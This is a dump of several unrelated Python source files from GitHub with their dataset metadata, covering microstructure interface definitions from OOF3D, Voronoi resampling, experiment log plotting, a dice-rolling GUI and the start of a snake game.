\n    def selectInterface(self, interfacename):\n        self._selectedInterfaceName = interfacename\n        #self.bdyselected.increment() # timestamp\n        switchboard.notify(\"interface selected\",\n                           self.microstructure, #ms object (microstructure.py)\n                           interfacename)\n        #switchboard.notify('redraw')\n    def unselectInterface(self):\n        if self._selectedInterfaceName is not None:\n            self._selectedInterfaceName = None\n            #self.bdyselected.increment()\n            switchboard.notify(\"interface unselected\",\n                               self.microstructure)\n            #switchboard.notify('redraw')\n    def getSelectedInterfaceName(self):\n        return self._selectedInterfaceName\n    def getSelectedInterface(self): # returns Interface object\n        if self._selectedInterfaceName is not None:\n            return self.namedinterfaces[self._selectedInterfaceName]\n\n    #Cases when we want to rebuild the mesh:\n    #(1) Interfaces added or removed\n    #(2) Bulk materials get deleted\n    #(3) Bulk materials get assigned to pixels\n    #(4) Renaming an interface material might also trigger a rebuild(?)\n    #(5) Pixel groups get destroyed or changed.\n    def rebuildMeshes(self):\n        meshclass = ooflib.engine.mesh.meshes\n        msname = self.microstructure.name()\n        for meshkey in meshclass.keys(base=msname):\n            mesh = meshclass[[msname] + meshkey]\n            mesh.begin_writing()\n            try:\n                mesh.interfacesChanged() # marks mesh as OutOfSync\n            finally:\n                mesh.end_writing()\n\nmicrostructure.registerMicrostructurePlugIn(InterfaceMSPlugIn, \"Interfaces\")\n\n#######################################################\n#Interface definitions. All interfaces are subclasses of InterfaceDef. \n\nclass InterfaceDef(registeredclass.RegisteredClass):\n    registry = []\n    tip = \"Tools to define interfaces.\"\n    discussion = \"\"\"\n    InterfaceDef objects are used by the interface creation\n    command\n    to define interfaces in a µstructure.\n    \"\"\"\n    def addToMS(self,interfacemsplugin,interfacename):\n        interfacemsplugin.addInterface(interfacename,self)\n    def check(self):\n        pass\n    def hasBulkMaterial(self,bulkmatname):\n        return 0\n    def renameBulkMaterial(self,oldname,newname):\n        return 0\n    # hasGroup and renameGroup are isomorphic to hasBulkMaterial and\n    # renameBulkMaterial. A generic function may be defined that does\n    # hasGroup and hasBulkMaterial, for example, but I'll leave the\n    # distinction here.\n    def hasGroup(self,groupname):\n        return 0\n    def renameGroup(self,oldname,newname):\n        return 0\n    def hasInterface(self,interfacename):\n##        if interfaceobj==self:\n##            return 1\n        return 0\n    def renameInterface(self,oldname,newname):\n        pass\n\nclass MaterialInterface(InterfaceDef):\n    def __init__(self,left,right):\n        #members must be spelled the same as the parameters\n        self.left=left\n        self.right=right\n    def check(self):\n        if self.left==self.right:\n            return 'The two sides must have different materials!'\n    #RegisteredClass already has a __repr__\n##    def info(self):\n##        return \"Between Bulk Materials (%s,%s)\" % (self.left,self.right)\n    #Useful function for finding out if the pair of bulk materials\n    #already has an interface material assigned to it.\n##    def __eq__(self,other):\n##        if self.__class__!=other.__class__:\n##            return 0\n##        return ((self._mat1==other._mat1 and \\\n##                 self._mat2==other._mat2) or\n##                (self._mat1==other._mat2 and\n##                 self._mat2==other._mat1))\n    # This function is used by the mesh construction function to test\n    # whether a skeleton segment is part of the interface. For\n    # segments which are parts of interfaces, it should return the\n    # left and right elements. 
One or the other of these may be null,\n    # but they should reflect the correct local geometry in any case.\n    def getAdjacentElements(self,seg,skelctxt):\n        els = seg.getElements()\n        if len(els) > 1:\n            mat0 = els[0].material(skelctxt)\n            mat1 = els[1].material(skelctxt)\n            if mat0==mat1: #Optional, if check() is used.\n                return AdjacentElements()\n\n            mat0name=NO_MATERIAL\n            if mat0:\n                mat0name=mat0.name()\n            mat1name=NO_MATERIAL\n            if mat1:\n                mat1name=mat1.name()\n\n            if self.left==mat0name and self.right==mat1name:\n                return AdjacentElements(els[0],els[1])\n            if self.right==mat0name and self.left==mat1name:\n                return AdjacentElements(els[1],els[0])\n            if self.left==ANY:\n                if self.right==mat0name:\n                    return AdjacentElements(els[1],els[0])\n                if self.right==mat1name:\n                    return AdjacentElements(els[0],els[1])\n            if self.right==ANY:\n                if self.left==mat0name:\n                    return AdjacentElements(els[0],els[1])\n                if self.left==mat1name:\n                    return AdjacentElements(els[1],els[0])\n        else:\n            # Only one element in the segment's element list -- we are\n            # on the boundary. We still might have a positive response.\n            n0=seg.get_nodes()[0].position()\n            n1=seg.get_nodes()[1].position()\n            xmax=skelctxt.getMicrostructure().size().x\n            ymax=skelctxt.getMicrostructure().size().y\n            if n0.y==ymax and n1.y==ymax:\n                compass=NORTH #golden\n            elif n0.y==0.0 and n1.y==0.0:\n                compass=SOUTH\n            elif n0.x==xmax and n1.x==xmax:\n                compass=EAST\n            #elif n0.x==0.0 and n1.x==0.0:\n            else:\n                compass=WEST\n            #\n            matname=NO_MATERIAL\n            mat = els[0].material(skelctxt)\n            if mat:\n                matname=mat.name()\n            if (self.left==matname or self.left==ANY) \\\n               and self.right==compass:\n                return AdjacentElements(els[0],None)\n            elif self.left==compass and \\\n                 (self.right==matname or self.right==ANY):\n                return AdjacentElements(None,els[0])\n        return AdjacentElements()\n    def hasBulkMaterial(self,bulkmatname):\n        if self.left==bulkmatname or self.right==bulkmatname:\n            return 1\n        return 0\n    def renameBulkMaterial(self,oldname,newname):\n        numrenamed=0\n        if self.left==oldname:\n            self.left=newname\n            numrenamed+=1\n        if self.right==oldname:\n            self.right=newname\n            numrenamed+=1\n        return numrenamed\n\nregisteredclass.Registration(\n    \"Between Bulk Materials\",\n    InterfaceDef,\n    MaterialInterface,\n    ordering=10,\n    params = [\n        materialparameter.BulkMaterialParameterExtra('left',\n                                                     tip=\"Bulk Material.\"),\n        materialparameter.BulkMaterialParameterExtra('right',\n                                                     tip=\"Bulk Material.\")\n    ],\n    tip=\"Define an interface between elements with different bulk materials.\",\n    discussion = \"\"\"\n\n    The object constructed from this class represents an interface between\n    two different bulk materials.\n\n    \"\"\"\n    )\n\nclass SingleMaterialInterface(InterfaceDef):\n    def __init__(self,left):\n        self.left=left\n    def check(self):\n        if self.left==ANY:\n            return 'Not a valid input!'\n    #This function is used by the mesh construction function to test\n    #whether a skeleton segment is part of the interface.\n    def getAdjacentElements(self,seg,skelctxt):\n        els = seg.getElements()\n        if len(els) > 1:\n            mat1 = els[0].material(skelctxt)\n            mat2 = els[1].material(skelctxt)\n            if mat1==mat2:\n                return AdjacentElements()\n            if self.left==NO_MATERIAL:\n                if (mat1 is None):\n                    return AdjacentElements(els[0],els[1])\n                if (mat2 is None):\n                    return AdjacentElements(els[1],els[0])\n            if (mat1 and self.left==mat1.name()):\n                return AdjacentElements(els[0],els[1])\n            if (mat2 and self.left==mat2.name()):\n                return AdjacentElements(els[1],els[0])\n        else:\n            if self.left==NORTH:\n                n0=seg.get_nodes()[0].position()\n                n1=seg.get_nodes()[1].position()\n                
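# (added note) a segment lies on the NORTH edge of the microstructure\n                # exactly when both of its endpoints sit at y == ymax; the SOUTH,\n                # EAST and WEST branches below apply the same test to the other edges.\n                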
ymax=skelctxt.getMicrostructure().size().y\n                if n0.y==ymax and n1.y==ymax:\n                    return AdjacentElements(None,els[0])\n                else:\n                    return AdjacentElements()\n            if self.left==SOUTH:\n                n0=seg.get_nodes()[0].position()\n                n1=seg.get_nodes()[1].position()\n                if n0.y==0.0 and n1.y==0.0:\n                    return AdjacentElements(None,els[0])\n                else:\n                    return AdjacentElements()\n            if self.left==EAST:\n                n0=seg.get_nodes()[0].position()\n                n1=seg.get_nodes()[1].position()\n                xmax=skelctxt.getMicrostructure().size().x\n                if n0.x==xmax and n1.x==xmax:\n                    return AdjacentElements(None,els[0])\n                else:\n                    return AdjacentElements()\n            if self.left==WEST:\n                n0=seg.get_nodes()[0].position()\n                n1=seg.get_nodes()[1].position()\n                if n0.x==0.0 and n1.x==0.0:\n                    return AdjacentElements(None,els[0])\n                else:\n                    return AdjacentElements()\n            mat = els[0].material(skelctxt)\n            if mat:\n                if self.left==mat.name():\n                    return AdjacentElements(els[0],None)\n        # Default...\n        return AdjacentElements()\n    def hasBulkMaterial(self,bulkmatname):\n        if self.left==bulkmatname:\n            return 1\n        return 0\n    def renameBulkMaterial(self,oldname,newname):\n        if self.left==oldname:\n            self.left=newname\n            return 1\n        return 0\n\nregisteredclass.Registration(\n    \"Around a Single Material\",\n    InterfaceDef,\n    SingleMaterialInterface,\n    ordering=15,\n    params = [\n        materialparameter.BulkMaterialParameterExtra('left',\n                                                     tip=\"Bulk Material.\")\n    ],\n    tip=\"Define an interface around elements with a given bulk material.\",\n    discussion = \"\"\"\n\n    The object constructed from this class represents an interface between\n    the specified bulk material and any other bulk material (or no material).\n\n    \"\"\"\n    )\n\nclass PixelGroupInterface(InterfaceDef):\n    def __init__(self,left,right):\n        self.left=left\n        self.right=right\n    def check(self):\n        if self.left==self.right:\n            return 'The two sides must have different pixel groups!'\n    #This function is used by the mesh construction function to test\n    #whether a skeleton segment is part of the interface.\n    def getAdjacentElements(self,seg,skelctxt):\n        els = seg.getElements()\n        if len(els) > 1:\n            msobj=skelctxt.getMicrostructure()\n            where = msobj.getRepresentativePixel(\n                els[0].dominantPixel(msobj))\n            grpnames1 = pixelgroup.pixelGroupNames(msobj, where)\n            where = msobj.getRepresentativePixel(\n                els[1].dominantPixel(msobj))\n            grpnames2 = pixelgroup.pixelGroupNames(msobj, where)\n            if self.left!=NO_PIXELGROUP and \\\n               self.right!=NO_PIXELGROUP:\n                if (self.left in grpnames1 and \\\n                    self.right in grpnames2):\n                    return AdjacentElements(els[0],els[1])\n                if (self.left in grpnames2 and \\\n                    self.right in grpnames1):\n                    return AdjacentElements(els[1],els[0])\n            elif self.left!=NO_PIXELGROUP:\n                if (self.left in grpnames1 and \\\n                    len(grpnames2)==0):\n                    return AdjacentElements(els[0],els[1])\n                if (self.left in grpnames2 and \\\n                    len(grpnames1)==0):\n                    return AdjacentElements(els[1],els[0])\n            elif self.right!=NO_PIXELGROUP:\n                if (self.right in grpnames1 and \\\n                    len(grpnames2)==0):\n                    return AdjacentElements(els[1],els[0])\n                if (self.right in grpnames2 and \\\n                    len(grpnames1)==0):\n                    return AdjacentElements(els[0],els[1])\n        else:\n            #Determine on which external boundary the segment lies\n            n0=seg.get_nodes()[0].position()\n            n1=seg.get_nodes()[1].position()\n            xmax=skelctxt.getMicrostructure().size().x\n            ymax=skelctxt.getMicrostructure().size().y\n            if n0.y==ymax and n1.y==ymax:\n                compass=NORTH #golden\n            elif n0.y==0.0 and n1.y==0.0:\n                compass=SOUTH\n            elif n0.x==xmax and n1.x==xmax:\n                compass=EAST\n            #elif n0.x==0.0 and n1.x==0.0:\n            else:\n                compass=WEST\n            #\n            
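# (added note) only els[0] exists on an external boundary; its pixel\n            # groups are compared against whichever side names a group, while the\n            # other side must name this segment's compass direction.\n            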
msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames = pixelgroup.pixelGroupNames(msobj, where)\n if self.left==compass and \\\n ((self.right in grpnames) or self.right==ANY):\n return AdjacentElements(None,els[0])\n if self.right==compass and \\\n ((self.left in grpnames) or self.left==ANY):\n return AdjacentElements(els[0],None)\n return AdjacentElements()\n\n def hasGroup(self,groupname):\n if self.left==groupname or self.right==groupname:\n return 1\n return 0\n def renameGroup(self,oldname,newname):\n if self.left==oldname:\n self.left=newname\n return 1\n if self.right==oldname:\n self.right=newname\n return 1\n return 0\n\nregisteredclass.Registration(\n \"Between Pixel Groups\",\n InterfaceDef,\n PixelGroupInterface,\n ordering=20,\n params = [\n pixelgroupparam.PixelGroupInterfaceParameter('left',\n tip=\"Pixels.\"),\n pixelgroupparam.PixelGroupInterfaceParameter('right',\n tip=\"Pixels.\")\n ],\n tip=\"Define an interface between elements with different pixel groups.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n two different pixel groups.\n\n \"\"\"\n )\n\nclass SinglePixelGroupInterface(InterfaceDef):\n def __init__(self,left):\n self.left=left\n def check(self):\n if self.left==ANY:\n return 'Not a valid input!'\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n els = seg.getElements()\n if len(els) > 1:\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames1 = pixelgroup.pixelGroupNames(msobj, where)\n where = msobj.getRepresentativePixel(\n els[1].dominantPixel(msobj))\n grpnames2 = pixelgroup.pixelGroupNames(msobj, where)\n if self.left!=NO_PIXELGROUP:\n if (self.left in grpnames1 and \\\n self.left not in grpnames2):\n return AdjacentElements(els[0],els[1])\n if (self.left in grpnames2 and \\\n self.left not in grpnames1):\n return AdjacentElements(els[1],els[0])\n else:\n if (len(grpnames1)>0 and len(grpnames2)==0):\n return AdjacentElements(els[1],els[0])\n if (len(grpnames2)>0 and len(grpnames1)==0):\n return AdjacentElements(els[0],els[1])\n else:\n if self.left==NORTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n ymax=skelctxt.getMicrostructure().size().y\n if n0.y==ymax and n1.y==ymax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==SOUTH:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.y==0.0 and n1.y==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==EAST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n xmax=skelctxt.getMicrostructure().size().x\n if n0.x==xmax and n1.x==xmax:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n if self.left==WEST:\n n0=seg.get_nodes()[0].position()\n n1=seg.get_nodes()[1].position()\n if n0.x==0.0 and n1.x==0.0:\n return AdjacentElements(None,els[0])\n else:\n return AdjacentElements()\n msobj=skelctxt.getMicrostructure()\n where = msobj.getRepresentativePixel(\n els[0].dominantPixel(msobj))\n grpnames = pixelgroup.pixelGroupNames(msobj, where)\n if self.left in grpnames:\n return AdjacentElements(els[0],None)\n # Default, obviously.\n return AdjacentElements()\n\n\n\n def hasGroup(self,groupname):\n if self.left==groupname:\n return 1\n 
return 0\n def renameGroup(self,oldname,newname):\n if self.left==oldname:\n self.left=newname\n return 1\n return 0\n\nregisteredclass.Registration(\n \"Around a Pixel Group\",\n InterfaceDef,\n SinglePixelGroupInterface,\n ordering=30,\n params = [\n pixelgroupparam.PixelGroupInterfaceParameter('left',\n tip=\"Pixels.\")\n ],\n tip=\"Define an interface around elements with a given pixel group.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface between\n the specified pixel group and any other pixel group (or no pixel group).\n\n \"\"\"\n )\n\n#Create a CompoundInterface parent class?\nclass UnionInterface(InterfaceDef):\n def __init__(self,interfaces):\n self.interfaces=interfaces\n self.namedinterfaces=utils.OrderedDict()\n## for interfacename in interfaces:\n## self.namedinterfaces[interfacename]=interfacemsplugin.namedinterfaces[interfacename]\n def addToMS(self,interfacemsplugin,interfacename):\n for name in self.interfaces:\n self.namedinterfaces[name]=interfacemsplugin.namedinterfaces[name]\n interfacemsplugin.addInterface(interfacename,self)\n## def info(self):\n## return \"Union of interfaces\\n\" + self.namedinterfaces\n## def __eq__(self,other):\n## if self.__class__!=other.__class__:\n## return 0\n## return ((self._interface1==other._interface1 and \\\n## self._interface2==other._interface2) or\n## (self._interface1==other._interface2 and\n## self._interface2==other._interface1))\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n # TODO OPT: This loop returns the first element-set where it gets\n # a hit -- this is fine as long as there is only one that will\n # do this. Is this in fact the case?\n for interfaceobj in self.namedinterfaces.values():\n els = interfaceobj.getAdjacentElements(seg,skelctxt)\n if els:\n return els\n return AdjacentElements()\n def hasBulkMaterial(self,bulkmatname):\n for interfaceobj in self.namedinterfaces.values():\n if interfaceobj.hasBulkMaterial(bulkmatname):\n return 1\n return 0\n def renameBulkMaterial(self,oldname,newname):\n numrenamed=0\n for interfaceobj in self.namedinterfaces.values():\n if interfaceobj.renameBulkMaterial(oldname,newname):\n numrenamed+=1\n return numrenamed\n def hasInterface(self,interfacename):\n for name, obj in self.namedinterfaces.items():\n if obj.hasInterface(interfacename):\n return 1\n if name==interfacename:\n return 1\n return 0\n def renameInterface(self,oldname,newname):\n interfacenames=self.namedinterfaces.keys()[:]\n for name in interfacenames:\n obj=self.namedinterfaces[name]\n obj.renameInterface(oldname,newname)\n if name==oldname:\n del self.namedinterfaces[oldname]\n self.namedinterfaces[newname]=obj\n\nregisteredclass.Registration(\n \"Union of named interfaces\",\n InterfaceDef,\n UnionInterface,\n ordering=100,\n params = [\n interfaceparameters.ListOfInterfacesParameter(\"interfaces\",\n tip=\"Current list of interfaces defined in this microstructure.\"),\n ],\n tip=\"Define an interface from a union of named interfaces.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface consisting of\n the union of a list of interfaces.\n\n \"\"\"\n )\n\n## Define a Microstructure IO PlugIn so that Interfaces\n## will be written to Microstructure data files.\n\n#OOF.LoadData.Microstructure.Interface.New is defined in interfacemenu.py\n#OOF.LoadData.Material.Interface.Assign is defined in materialmenu.py\n\ndef 
writeInterface(datafile, mscontext):\n    #Interface branch\n    #TODO 3.1: The bulk materials that define the interfaces must be written,\n    #even if the material is not assigned to pixels.\n    #Interface materials are not assigned to pixels. They must be\n    #explicitly listed here.\n    msobj=mscontext.getObject()\n    interfacemsplugin=msobj.getPlugIn(\"Interfaces\")\n    for interfacename, interfacedef in interfacemsplugin.namedinterfaces.items():\n        datafile.startCmd(OOF.LoadData.Microstructure.Interface.New)\n        datafile.argument('microstructure',msobj.name())\n        datafile.argument('name',interfacename)\n        datafile.argument('interface_type',interfacedef)\n        datafile.endCmd()\n\n    #Write interface properties and materials.\n    #An interface material is saved only if it has been assigned to\n    #an interface.\n    materialmenu.writeMaterials(datafile,\n                                [materialmanager.getMaterial(m)\n                                 for m in interfacemsplugin.getInterfaceMaterials()])\n\n    #Assign interface materials to interfaces\n    for matname, interfacenames in interfacemsplugin._materialassignments.items():\n        if len(interfacenames)==0:\n            continue\n##        datafile.startCmd(OOF.LoadData.MaterialandType)\n##        datafile.argument('name',matname)\n##        matobj=materialmanager.getMaterial(matname)\n##        datafile.argument('properties', [prop.registration().name()\n##                                         for prop in matobj.properties()])\n##        datafile.argument('materialtype',matobj.type())\n##        datafile.endCmd()\n        datafile.startCmd(OOF.LoadData.Material.Interface.Assign)\n        datafile.argument('microstructure',msobj.name())\n        datafile.argument('material',matname)\n        datafile.argument('interfaces',interfacenames)\n        datafile.endCmd()\n\nif runtimeflags.surface_mode:\n    microstructureIO.registerMicrostructureIOPlugIn_last(writeInterface)\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/interfaceplugin.py","file_name":"interfaceplugin.py","file_ext":"py","file_size_in_byte":45399,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"23661017614","text":"'''\nhttps://www.acmicpc.net/problem/9375\nThink of it simply:\nfor one kind of item -> (the option of choosing nothing) + (the number of items of that kind) -> n+1\n\nmultiply (n+1) over all kinds - subtract the single case where nothing is chosen at all\n'''\ncase = int(input())\nfor i in range(case):\n    n = int(input())\n    type_dict = {}\n    for _ in range(n):\n        name = input().split()[-1]\n        num = type_dict.get(name, 1)\n        type_dict[name] = num + 1\n    arr = list(type_dict.values())\n    rs = 1\n    for i in arr:\n        rs *= i\n    print(rs-1)\n\n\n","repo_name":"LazyerIJ/Algorithm","sub_path":"Problem/BakJoon/Math_3/bj_9375.py","file_name":"bj_9375.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19111950477","text":"import numpy as np\nimport itertools\nimport scipy.spatial as sp\nfrom resamvo.voronoi_multi import voronoi_cell_points_multi\n\ndef in_box(points_original, bounding_box):\n    points = points_original.copy()\n    return np.all(np.logical_and(bounding_box[:,0] <= points, points <= bounding_box[:,1]), axis=1)\n\ndef voronoi_finite_cell_points(points_original, points_target,bounding_box):\n    points = points_original.copy()\n    n_points, dim_points = points.shape\n    in_box_index = in_box(points, bounding_box)\n    # Mirror points\n    points_center = points[in_box_index]\n    points_all = points_center.copy()\n    for i in range(dim_points):\n        points_mirror_low = points_center.copy()\n        points_mirror_high = points_center.copy()\n        points_mirror_low[:,i] = bounding_box[i,0] - (points_mirror_low[:,i] - bounding_box[i,0])\n        points_mirror_high[:,i] = bounding_box[i,1] + 
(bounding_box[i,1] - points_mirror_high[:,i])\n points_all = np.concatenate((points_all, points_mirror_low,points_mirror_high), axis=0)\n # Compute Voronoi\n vor = sp.Voronoi(points_all)\n filtered_points = points_center\n filtered_regions = list(map(vor.regions.__getitem__, vor.point_region[:n_points]))\n filtered_regions_flat = list(itertools.chain.from_iterable(filtered_regions))\n if (-1 in filtered_regions_flat):\n print(\"Warning: Some cells are open\")\n print(\"Number of open cells: \", filtered_regions_flat.count(-1))\n return None\n cell_vertices = [vor.vertices[filtered_regions[i],:] for i in range(n_points)]\n cell_sdss_nums = voronoi_cell_points_multi(cell_vertices,points_target)\n return cell_sdss_nums\n \ndef voronoi_resample_num_ratio(source_df, target_df, match_prop):\n source_df_copy = source_df.copy()\n target_df_copy = target_df.copy()\n source_prop = source_df.loc[:,match_prop].values\n target_prop = target_df.loc[:,match_prop].values\n n_source, n_dim_source = source_prop.shape\n n_target, n_dim_target = target_prop.shape\n assert n_dim_source == n_dim_target\n # Compute bounding box\n bounding_box_mins = source_df_copy.min()[match_prop].values.reshape(n_dim_source,1)\n bounding_box_maxs = source_df_copy.max()[match_prop].values.reshape(n_dim_source,1)\n bounding_box =np.concatenate((bounding_box_mins, bounding_box_maxs), axis=1)\n # Compute nums in Voronoi cells\n cell_target_nums = voronoi_finite_cell_points(source_prop, target_prop,bounding_box)\n return cell_target_nums","repo_name":"Abrygzy/resamvo","sub_path":"resamvo/voronoi_resample.py","file_name":"voronoi_resample.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42075832190","text":"# mypy: ignore-errors\nimport traceback\nfrom typing import Optional\n\nfrom rlo.compare_runs import compare_reps_within_run\nfrom rlo.experiment_result import load_events_from_config\nfrom rlo.expr_sets import ExpressionSet\nfrom rlo.extra_plots import extra_plots\nfrom rlo.plot_clustering_summary import plot_clustering_summary_from_config\nfrom rlo.plot_costs import plot_costs_from_config\nfrom rlo.plot_rollouts import plot_success_from_config\nfrom rlo.plot_dataset_summary import plot_dataset_summary_from_config\nfrom rlo.plot_dataset_overlap import plot_dataset_overlap_from_config\nfrom rlo.plot_empirical_animated import plot_empirical_animated_from_config\nfrom rlo.plot_empirical_predicted_values import (\n plot_empirical_predicted_values_from_config,\n)\nfrom rlo.plot_intra_gen_loss import plot_intra_gen_loss_animated_from_config\nfrom rlo.plot_rewrite_sequences import plot_rewrite_sequences_from_config\nfrom rlo.plot_ray_tasks import plot_ray_tasks_from_config\nfrom rlo.plot_train_summary import plot_train_loss_from_config\nfrom rlo.plot_search_summary import plot_search_summary_from_config\nfrom rlo.print_best_episodes import output_best_episodes_from_config\nfrom rlo.plot_merging_across_generations import (\n plot_merging_across_generations_from_config,\n)\nfrom rlo.plot_time_lefts_during_search import plot_time_lefts_during_search_from_config\nfrom rlo.plot_state_values_animated import plot_state_values_animated_from_config\nfrom rlo.plot_scatter_fitted import plot_scatter_fitted_from_config\nfrom rlo.reporting import azureml, cosmosdb\nfrom rlo.save_rlo_to_ksc import save_rlo_to_ksc_from_config\nfrom plot_success import plot_success_summary_from_config\n\nimport functools\n\n\ndef summarize_logs(\n config, 
eval_exprs: Optional[ExpressionSet] = None, loglevel=1, ray=False\n):\n\n # Plots that require logs of verbosity >= 1\n verbose_plots = [\n plot_empirical_predicted_values_from_config,\n plot_empirical_animated_from_config,\n plot_intra_gen_loss_animated_from_config,\n plot_dataset_summary_from_config,\n plot_dataset_overlap_from_config,\n plot_scatter_fitted_from_config,\n ] + [extra_plots[plot_name] for plot_name in config[\"extra_plots\"]]\n if config[\"train_search\"] in [\"astar\", \"beam\", \"hybrid\"]:\n verbose_plots.append(\n functools.partial(plot_time_lefts_during_search_from_config, phase=\"train\")\n )\n if config[\"eval_search\"] in [\"astar\", \"beam\", \"hybrid\"]:\n verbose_plots.append(\n functools.partial(plot_time_lefts_during_search_from_config, phase=\"eval\")\n )\n\n # Plots that only require logs of verbosity == 0\n non_verbose_plots = [\n plot_costs_from_config,\n plot_train_loss_from_config,\n plot_search_summary_from_config,\n plot_state_values_animated_from_config,\n output_best_episodes_from_config,\n plot_success_summary_from_config,\n ]\n # add conditional non-verbose plots\n if config[\"num_episode_clusters\"] > 0:\n non_verbose_plots.append(plot_clustering_summary_from_config)\n if config[\"eval_search\"] == \"astar\":\n non_verbose_plots.append(plot_rewrite_sequences_from_config)\n if \"best_across_generations_refiner\" in config[\"dataset_refiners\"]:\n non_verbose_plots.append(plot_merging_across_generations_from_config)\n if ray:\n non_verbose_plots.append(plot_ray_tasks_from_config)\n if config[\"eval_search\"] == \"rollout\":\n # These plots are about frequency of rollouts defined by softmax policy, so not applicable to A*\n non_verbose_plots.append(plot_success_from_config)\n if config[\"eval_search\"] == \"rollout\":\n non_verbose_plots.append(\n functools.partial(plot_costs_from_config, frequency_x_scale=\"generation\")\n )\n\n # verbose events are potentially very large, so this loads them only lazily\n verbose_events = load_events_from_config(config, verbosity=loglevel)\n\n # Store the exceptions themselves as well as tracebacks so that they're accessible\n # to the debugger\n exception_list = []\n exception_traceback_list = []\n if loglevel >= 1:\n for pl in verbose_plots:\n try:\n pl(config, events=verbose_events)\n except Exception as e:\n exception_traceback_list.append(\"\".join(traceback.format_exc()))\n exception_list.append(e)\n\n # verbosity=0 events are much smaller\n # load into memory with `list` for faster repeated iteration\n events = list(load_events_from_config(config, verbosity=0))\n for pl in non_verbose_plots:\n try:\n pl(config, events=events)\n except Exception as e:\n exception_traceback_list.append(\"\".join(traceback.format_exc()))\n exception_list.append(e)\n\n # Log metrics to Azure ML\n azureml.log_all_metrics(config, events)\n\n if config[\"template_path\"] is not None:\n save_rlo_to_ksc_from_config(\n config, events=events, orig_exprs=dict(eval_exprs.named_exprenvs())\n )\n\n # Upload the run information to Cosmos DB\n # Don't allow interactive authentication as it will fail in QuickTest\n cosmosdb.upload_run_to_db(config, allow_interactive=False)\n\n # Upload models to Azure ML workspace if running in Azure ML\n if config[\"upload_models\"]:\n azureml.upload_locally_saved_models(config)\n\n if config.get(\"seed_all_reps\") is not None:\n compare_reps_within_run(events, sort=ray)\n\n if len(exception_list) > 0:\n raise Exception(\n f\"Some of the plots have not been generated:\\n\"\n 
\"\\n\".join(exception_traceback_list),\n )\n\n return events\n","repo_name":"microsoft/knossos-ksc","sub_path":"rlo/src/rlo/summarize_logs.py","file_name":"summarize_logs.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"11669678187","text":"from scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef dyn_ode (x, t):\n return dyn_d_avant(t, x)\n\nh = 0.001\ntmax = 10\nT =np.arange (0, tmax, h)\nx0 = np.array([1, 1])\nsolution = odeint(dyn_ode, x0, T)\n\nplt.plot (T, solution)\n\n","repo_name":"Nickeroro/Analyse_Numerique","sub_path":"odeint.py","file_name":"odeint.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35733258885","text":"# Dice Rolling Simulator, 22-July-22\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\n# Root Settings\r\nroot = Tk()\r\nroot.title(\"Dice Rolling Simulator\")\r\nroot.geometry(\"220x175\")\r\n\r\n\r\n# list to store numbers rolled.\r\nrolled = [0]\r\n\r\n\r\n# __Functionality__\r\ndef rolling():\r\n roll = random.randint(1, 6)\r\n\r\n rolled.append(roll)\r\n\r\n display.delete(0, END)\r\n display.insert(0, str(roll))\r\n\r\n Label(root, text=rolled[-2], font='Tahoma 10 bold').grid(row=4, column=0, sticky=W+E, padx=10)\r\n\r\n# __Layout__\r\n\r\n\r\n# Title for D.R.S:\r\ntitle = Label(root, text=\"Dice Rolling Simulator\", font=('Tahoma', 15))\r\ntitle.grid(row=0, column=0, sticky=W+E, padx=10, pady=10)\r\n\r\n# Display for D.R.S:\r\ndisplay = Entry(root, font=('Tahoma', 10), justify=CENTER)\r\ndisplay.grid(row=1, column=0, sticky=W+E, padx=10, pady=5)\r\n\r\n# Button for D.R.S (to roll):\r\nroll_button = Button(root, text=\"Roll\", font=('Tahoma', 10), command=rolling)\r\nroll_button.grid(row=2, column=0, sticky=W+E, padx=10, pady=5)\r\n\r\n# Last Number Rolled, Title:\r\nlast_number_rolled = Label(root, text=\"Last Number Rolled\", font='Tahoma 10 underline')\r\nlast_number_rolled.grid(row=3, column=0, sticky=W+E, padx=10, pady=(5, 0))\r\n\r\nroot.mainloop()\r\n","repo_name":"SelfTaught-HamzaCodes/Tkinter","sub_path":"Dice_Rolling_Simulator.py","file_name":"Dice_Rolling_Simulator.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1614931559","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 9 13:02:48 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport pygame\r\nimport sys\r\nimport random\r\nfrom pygame import *\r\n\r\n# 以25为单位\r\npixel=25\r\n\r\n# 蛇类\r\nclass Snake(object):\r\n def __init__(self,screen_x,screen_y):\r\n #定义常量\r\n self.direction=2\r\n self.body=[]\r\n 